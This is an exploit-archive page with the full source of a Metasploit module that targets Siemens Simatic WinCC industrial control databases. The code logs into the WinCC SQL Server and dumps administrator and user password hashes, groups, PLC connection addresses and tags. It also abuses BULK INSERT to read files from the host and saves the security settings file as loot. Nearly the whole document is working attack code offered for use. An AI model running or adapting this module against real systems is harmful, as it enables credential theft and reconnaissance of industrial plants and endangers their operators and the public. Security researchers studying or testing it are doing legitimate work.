
Simatic WinCC Information Harvester

Simatic WinCC Information Harvester
Posted Jan 21, 2013
Authored by Gleb Gritsai, Vyacheslav Egoshin, Dmitry Nagibin | Site metasploit.com

This Metasploit module retrieves sensitive information from the WinCC database.

tags | exploit
SHA-256 | 627da9137aaf5c71b77b876b03bb54d07c3d0135bcd88283a54933c5111a7071

## encoding: UTF-8
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

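class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL
  include Msf::Auxiliary::Report # store_loot, used to save the retrieved settings file

  # Fixed paths read through the database server; keyed by the label passed to get_value.
  CONFIG = {
    "Security settings path" => %q|C:\Documents and Settings\All Users\Documents\SimaticSecurityControl\setRules.xml|,
    "test" => %q|C:\Windows\win.ini|
  }.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Simatic WinCC info harvester',
      'Description' => %q{
        This module receives sensitive information from the WinCC database.
      },
      'Author'      =>
        [
          'Dmitry Nagibin', # research
          'Gleb Gritsai <ggritsai@ptsecurity.ru>', # research
          'Vyacheslav Egoshin <vegoshin@ptsecurity.ru>', # metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'URL', 'http://www.ptsecurity.com' ]
        ],
      'Version'     => '$Revision$',
      'DisclosureDate' => 'Jun 3 2012'
    ))

    # NOTE(review): this option is registered but never read; the paths in
    # CONFIG are hard-coded and do not use it.
    register_options(
      [
        OptString.new('DOCUMENTS_FOLDER_NAME', [true, "Documents folder name", 'Documents']),
      ], self.class
    )
  end

  # Entry point: logs in with the datastore credentials, enumerates the WinCC
  # project databases (names matching CC%_[0-9]) and harvests each of them.
  # Errors are reported via print_error; nothing is returned to the caller.
  def run
    unless mssql_login_datastore
      print_error "Can't connect to the database"
      return
    end

    project_databases_names = q("SELECT name FROM master..sysdatabases WHERE name LIKE 'CC%_[0-9]'")
    # q has already printed the server error when it returns nil
    return if project_databases_names.nil?

    get_info project_databases_names
  end

  # Runs +query+ and returns its rows, or the whole result hash when +only_rows+
  # is false.
  #
  # When the server reports errors and +show_errors+ is true, the errors and the
  # offending query are printed and nil is returned. With +show_errors+ false the
  # errors are ignored and the (possibly empty) result is returned regardless.
  def q query, show_errors = true, verbose = false, only_rows = true
    result = mssql_query(query, verbose)
    if show_errors && !result[:errors].empty?
      print_error "Error: #{result[:errors]}"
      print_error "Error query: #{query}"
      return nil
    end
    only_rows ? result[:rows] : result
  end

  # Collects project name, accounts, groups, PLC connections and tags from every
  # project database in +dbs+ (an array of rows whose first column is the
  # database name), prints them and returns the collected data keyed by database.
  def get_info dbs
    prj = {}
    dbs.each do |row|
      db = row.first # first column is the database name
      prj[db] = collect_project_data(db)
      print_project(db, prj[db])

      # The SQL Server service account may be able to read files from the host
      # through BULK INSERT; if the probe file is readable, fetch and keep the
      # security settings file.
      if can_read_file? db
        settings = read_file get_value("Security settings path"), db
        save_settings(settings) unless settings.nil? || settings.empty?
      end
      print_line
    end
    prj
  end

  # Prints +rows+ (nil allowed: nothing is printed) as an indented table with
  # the given +columns+ and +header+.
  def print_table columns, rows, header = ''
    return if rows.nil?

    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => 4,
      'Header'  => header,
      'Columns' => columns
    )
    rows.each { |r| tbl << r }
    print_line tbl.to_s
  end

  # Reads +file_name+ from the database host by bulk-loading it into a scratch
  # table and selecting it back. Returns the rows (one single-column array per
  # line) or nil when the select itself yields nothing; errors from the
  # individual statements are not reported. +db+ is unused and kept for callers.
  #
  # +file_name+ is interpolated into the SQL statement; callers only pass the
  # fixed paths from CONFIG. The fixed scratch-table name and the BULK INSERT
  # statement are visible in SQL Server audit logging.
  def read_file file_name, db
    q("CREATE TABLE mydata (line varchar(8000));", false)
    q("BULK INSERT mydata FROM '#{file_name}';", false)
    result = q("select * from mydata", false)
    q("DROP TABLE mydata;", false)
    print_error("Can't read file: #{file_name}") if result.nil?
    result
  end

  # Probes whether files on the database host can be read (see read_file) by
  # fetching the "test" path from CONFIG. Returns true only when at least one
  # line came back; a nil result no longer raises.
  def can_read_file? db
    res = read_file get_value("test"), db
    return false if res.nil?

    print_status "Access read files! (#{get_value "test"} read)"
    !res.empty?
  end

  # Looks up a fixed path by label; returns nil for unknown labels.
  def get_value i
    CONFIG[i]
  end

  private

  # Queries the WinCC tables the module reads from one project database.
  # Each value is the row array returned by q, or nil when the query failed.
  def collect_project_data(db)
    data = {}
    data["name"]   = q("SELECT DSN FROM #{db}.dbo.CC_CsSysInfoLog")
    data["admins"] = q("SELECT NAME, convert(varbinary, PASS) as PWD from #{db}.dbo.PW_USER WHERE PASS <> '' and GRPID = 1000")
    data["users"]  = q("SELECT ID, NAME, convert(varbinary, PASS), GRPID FROM #{db}.[dbo].[PW_USER] WHERE PASS <> '' and GRPID <> 1000")
    data["groups"] = q("SELECT ID, NAME FROM #{db}.[dbo].[PW_USER] WHERE PASS = ''")
    data["plcs"]   = q("SELECT CONNECTIONNAME, PARAMETER FROM #{db}.[dbo].[MCPTCONNECTION]")
    data["tags"]   = q("SELECT VARNAME,VARTYP,COMMENTS FROM #{db}.[dbo].[PDE#TAGs]")
    data["plcs"]   = extract_plc_ips(data["plcs"])
    data
  end

  # Reduces each PLC PARAMETER value to the first dotted quad it contains,
  # leaving the value untouched when no IP notation is present. nil in, nil out.
  def extract_plc_ips(rows)
    return nil if rows.nil?

    rows.map do |name, param|
      dotted_quad = param.to_s[/\d+\.\d+\.\d+\.\d+/]
      [name, dotted_quad || param]
    end
  end

  # Prints the project name (falling back to the database name when the
  # CC_CsSysInfoLog query returned nothing) followed by the harvested tables.
  def print_project(db, data)
    project_name = Array(Array(data["name"]).first).first || db
    print_good "Project: #{project_name}\n"

    print_table %w|ID NAME|, data["groups"], "WinCC groups"
    print_table %w|Name Password(hex)|, data["admins"], "WinCC administrator"
    print_table %w|ID NAME Password(hex) GRPID|, data["users"], "WinCC users"
    print_table %w|VARNAME VARTYP COMMENTS|, data["tags"], "WinCC tags"
    print_table %w|CONNECTIONNAME PARAMETER|, data["plcs"], "WinCC PLCs"
  end

  # Saves the retrieved settings file (+rows+ as returned by read_file) as loot
  # tied to the target host, instead of a fixed, predictable path under /tmp
  # that is shared with every other user of the operator's machine.
  def save_settings(rows)
    content = rows.flatten.join("\n")
    path = store_loot('wincc.security_settings', 'text/xml', rhost, content,
                      'security_settings.xml', 'WinCC security settings')
    print_good "Security settings saved to #{path}"
  end
end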


